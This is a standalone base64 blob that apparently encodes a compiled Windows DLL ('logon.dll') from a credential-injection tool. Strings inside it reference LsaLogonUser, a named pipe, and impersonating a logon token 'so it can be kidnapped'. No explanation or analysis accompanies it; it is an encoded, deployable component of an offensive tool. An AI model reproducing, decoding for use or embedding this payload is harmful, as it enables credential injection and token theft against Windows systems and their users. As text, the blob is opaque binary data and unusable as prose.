QABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBARAAAQEBAQEBAQEBAQEBAQECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgEQAAIBAgECAQIBAgECAQIBAgEBAQAAAAAAAAAAAAAAAICBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlae3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn8AMSNTTkFOAAAxI0lORAAAADEjSU5GAAAAMSNRTkFOAABDAE8ATgBPAFUAVAAkAAAAQQAAABcAAABnZW5lcmljAHVua25vd24gZXJyb3IAAABpb3N0cmVhbQAAAAAAAAAAaW9zdHJlYW0gc3RyZWFtIGVycm9yAAAAc3lzdGVtAABzdHJpbmcgdG9vIGxvbmcAaW52YWxpZCBzdHJpbmcgcG9zaXRpb24AXABcAC4AXABwAGkAcABlAFwAcwBxAHMAdgBjAAAAAABFcnJvciBjYWxsaW5nIExzYUNvbm5lY3RVbnRydXN0ZWQuIEVycm9yIGNvZGU6IABoTFNBIChMU0EgaGFuZGxlKSBpcyBOVUxMLCB0aGlzIHNob3VsZG4ndCBldmVyIGhhcHBlbi4AAE1JQ1JPU09GVF9BVVRIRU5USUNBVElPTl9QQUNLQUdFX1YxXzAAAABLZXJiZXJvcwAAAAAAAAAAUmVjZWl2ZWQgYW4gaW52YWxpZCBhdXRoIHBhY2thZ2UgZnJvbSB0aGUgbmFtZWQgcGlwZQAAAABDYWxsIHRvIExzYUxvb2t1cEF1dGhlbnRpY2F0aW9uUGFja2FnZSBmYWlsZWQuIEVycm9yIGNvZGU6IAAAAAAAQ2FsbCB0byBPcGVuUHJvY2Vzc1Rva2VuIGZhaWxlZC4gRXJyb3Jjb2RlOiAAAAAAQ2FsbCB0byBHZXRUb2tlbkluZm9ybWF0aW9uIGZhaWxlZC4AAAAAAEVycm9yIGNhbGxpbmcgTHNhTG9nb25Vc2VyLiBFcnJvciBjb2RlOiAAAAAAAAAAAAAAAAAAAAAATG9nb24gc3VjY2VlZGVkLCBpbXBlcnNvbmF0aW5nIHRoZSB0b2tlbiBzbyBpdCBjYW4gYmUga2lkbmFwcGVkIGFuZCBzdGFydGluZyBhbiBpbmZpbml0ZSBsb29wIHdpdGggdGhlIHRocmVhZC4AACVsdQAlZAAAJWxkAAAAAAAiBZMZBAAAAASOAQACAAAAJI4BAAgAAAB0jgEAIAAAAAAAAAABAAAAAAAAAAAAAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLABgAEAAAAAAAAAAAAAAAAAAAAAAAAAUlNEUw2V/cT8C+hPggQPjYC0npkBAAAAQzpcR2l0SHViXFBvd2VyU2hlbGxcSW52b2tlLUNyZWRlbnRpYWxJbmplY3Rpb25cTG9nb25Vc2VyXExvZ29uVXNlclx4NjRcUmVsZWFzZVxsb2dvbi5wZGIAAAAAAAAAoAAAAKAAAAAAAAAAAAAAAAjIAQAAAAAAAAAAAP////8AAAAAQAAAACCIAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAA4iAEAAAAAAAAAAAD4hwEAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAA4McBAHCIAQBIiAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIiIAQAAAAAAAAAAAKCIAQD4hwEAAAAAAAAAAAAAAAAAAAAAAODHAQABAAAAAAAAAP////8AAAAAQAAAAHCIAQAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAwyAEA8IgBAMiIAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAACIkBAAAAAAAAAAAAIIkBAPiHAQAAAAAAAAAAAAAAAAAAAAAAMMgBAAEAAAAAAAAA/////wAAAABAAAAA8IgBAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAFjIAQBwiQEASIkBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAACIiQEAAAAAAAAAAACoiQEAIIkBAPiHAQAAAAAAAAAAAAAAAAAAAAAAAAAAAFjIAQACAAAAAAAAAP////8AAAAAQAAAAHCJAQAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAACAyAEA+IkBANCJAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAEIoBAAAAAAAAAAAAMIoBACCJAQD4hwEAAAAAAAAAAAAAAAAAAAAAAAAAAACAyAEAAgAAAAAAAAD/////AAAAAEAAAAD4iQEAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAqMgBAICKAQBYigEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAJiKAQAAAAAAAAAAAKiKAQAAAAAAAAAAAAAAAACoyAEAAAAAAAAAAAD/////AAAAAEAAAACAigEAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAACMgBACCIAQDQigEAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAMjIAQAgiwEA+IoBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAA4iwEAAAAAAAAAAABQiwEA+IcBAAAAAAAAAAAAAAAAAAAAAADIyAEAAQAAAAAAAAD/////AAAAAEAAAAAgiwEAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAuIwBAAAAAAAAAAAAYMkBAAAAAAAAAAAA/////wAAAABAAAAAeIsBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAANCLAQAAAAAAAAAAAMiMAQAYjAEAkIsBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAkMkBAEiNAQDwiwEAAAAAAAAAAAAAAAAAAAAAAJDJAQABAAAAAAAAAP////8AAAAAQAAAAEiNAQAAAAAAAAAAAAAAAADwyAEAAgAAAAAAAAD/////AAAAAEAAAADwjAEAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAYMkBAHiLAQBojAEAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAPDIAQDwjAEAkIwBAAAAAAAAAAAAAAAAAAAAAACQiwEAAAAAAAAAAAAAAAAAKMkBAAIAAAAAAAAA/////wAAAABAAAAAuIsBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAGCNAQAAAAAAAAAAAAEAAAAAAAAAAAAAACjJAQC4iwEACI0BAAAAAAAAAAAAAAAAAAAAAAAYjAEAkIsBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwjQEAAAAAAAAAAABAjAEAGIwBAJCLAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQYCAAYyAjABBgIABlI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BAAAAAACyowEAAAAAAMyjAQAAAAAA4KMBAAAAAAD0owEAAAAAABCkAQAAAAAALqQBAAAAAABWpAEAAAAAAGqkAQAAAAAAdqQBAAAAAACEpAEAAAAAAJKkAQAAAAAAnKQBAAAAAACwpAEAAAAAAMikAQAAAAAA4KQBAAAAAAD2pAEAAAAAAAilAQAAAAAAGqUBAAAAAAAkpQEAAAAAADClAQAAAAAAPKUBAAAAAABKpQEAAAAAAFqlAQAAAAAAaqUBAAAAAAB8pQEAAAAAAJClAQAAAAAApqUBAAAAAAAAAAAAAAAAAICgAQAAAAAAXqABAAAAAABIoAEAAAAAAAAAAAAAAAAAJgBMc2FDb25uZWN0VW50cnVzdGVkACwATHNhTG9va3VwQXV0aGVudGljYXRpb25QYWNrYWdlAAArAExzYUxvZ29uVXNlcgAAU2VjdXIzMi5kbGwAwgBDcmVhdGVGaWxlVwBTBFJlYWRGaWxlAAAPAkdldEN1cnJlbnRQcm9jZXNzAFYCR2V0TGFzdEVycm9yAADRAENyZWF0ZU11dGV4VwAAXwVTbGVlcAAdBmxzdHJsZW5XAADvBVdyaXRlRmlsZQBLRVJORUwzMi5kbGwAANMBTHNhTnRTdGF0dXNUb1dpbkVycm9yABICT3BlblByb2Nlc3NUb2tlbgAAbwFHZXRUb2tlbkluZm9ybWF0aW9uAIkBSW1wZXJzb25hdGVMb2dnZWRPblVzZXIAQURWQVBJMzIuZGxsAAAlAUVuY29kZVBvaW50ZXIA/wBEZWNvZGVQb2ludGVyAM4BR2V0Q29tbWFuZExpbmVBABQCR2V0Q3VycmVudFRocmVhZElkAAC2BFJ0bFBjVG9GaWxlSGVhZGVyAEMEUmFpc2VFeGNlcHRpb24AALQEUnRsTG9va3VwRnVuY3Rpb25FbnRyeQAAugRSdGxVbndpbmRFeABqA0lzRGVidWdnZXJQcmVzZW50AHADSXNQcm9jZXNzb3JGZWF0dXJlUHJlc2VudABXAUV4aXRQcm9jZXNzAGwCR2V0TW9kdWxlSGFuZGxlRXhXAACkAkdldFByb2NBZGRyZXNzAADUA011bHRpQnl0ZVRvV2lkZUNoYXIA2wVXaWRlQ2hhclRvTXVsdGlCeXRlAEEDSGVhcFNpemUAADwDSGVhcEZyZWUAADgDSGVhcEFsbG9jABgFU2V0TGFzdEVycm9yAACpAkdldFByb2Nlc3NIZWFwAADHAkdldFN0ZEhhbmRsZQAARQJHZXRGaWxlVHlwZQAGAURlbGV0ZUNyaXRpY2FsU2VjdGlvbgDFAkdldFN0YXJ0dXBJbmZvVwBoAkdldE1vZHVsZUZpbGVOYW1lQQAAMARRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgAQAkdldEN1cnJlbnRQcm9jZXNzSWQA3QJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQAuAkdldEVudmlyb25tZW50U3RyaW5nc1cAAKMBRnJlZUVudmlyb25tZW50U3RyaW5nc1cArQRSdGxDYXB0dXJlQ29udGV4dAC7BFJ0bFZpcnR1YWxVbndpbmQAAJAFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABQBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgBRA0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb25BbmRTcGluQ291bnQAbgVUZXJtaW5hdGVQcm9jZXNzAACABVRsc0FsbG9jAACCBVRsc0dldFZhbHVlAIMFVGxzU2V0VmFsdWUAgQVUbHNGcmVlAG0CR2V0TW9kdWxlSGFuZGxlVwAAKQFFbnRlckNyaXRpY2FsU2VjdGlvbgAApQNMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAaQJHZXRNb2R1bGVGaWxlTmFtZVcAAKoDTG9hZExpYnJhcnlFeFcAAHUDSXNWYWxpZENvZGVQYWdlAKoBR2V0QUNQAACNAkdldE9FTUNQAAC5AUdldENQSW5mbwA/A0hlYXBSZUFsbG9jAJkDTENNYXBTdHJpbmdXAADiAUdldENvbnNvbGVDUAAA9AFHZXRDb25zb2xlTW9kZQAACwVTZXRGaWxlUG9pbnRlckV4AAD9A091dHB1dERlYnVnU3RyaW5nVwAAzAJHZXRTdHJpbmdUeXBlVwAALgVTZXRTdGRIYW5kbGUAAO4FV3JpdGVDb25zb2xlVwCYAUZsdXNoRmlsZUJ1ZmZlcnMAAH8AQ2xvc2VIYW5kbGUAAAAAAAAAdZgAAHOYAAAyot8tmSsAAM1dINJm1P//AQAAAAIAAAACAAAAAQAAAAAAAAAAAAAA6CgBgAEAAADwKAGAAQAAAAEAAAAWAAAAAgAAAAIAAAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcAAAAMAAAACAAAAAwAAAAJAAAADAAAAAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAADwAAAAIAAAAQAAAADQAAABEAAAASAAAAEgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0AAABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABTAAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAADQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYAAAAWAAAAgAAAAAoAAACBAAAACgAAAIIAAAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAAAA0AAAChAAAAAgAAAKQAAAALAAAApwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAADAAAAAwAAAAIAAAA/////wAAAAAAAAAAAAAAAP//////////gAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAEDFAIABAAAAQMUAgAEAAABAxQCAAQAAAEDFAIABAAAAQMUAgAEAAABAxQCAAQAAAEDFAIABAAAAQMUAgAEAAABAxQCAAQAAAEDFAIABAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6AAAAAAAAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA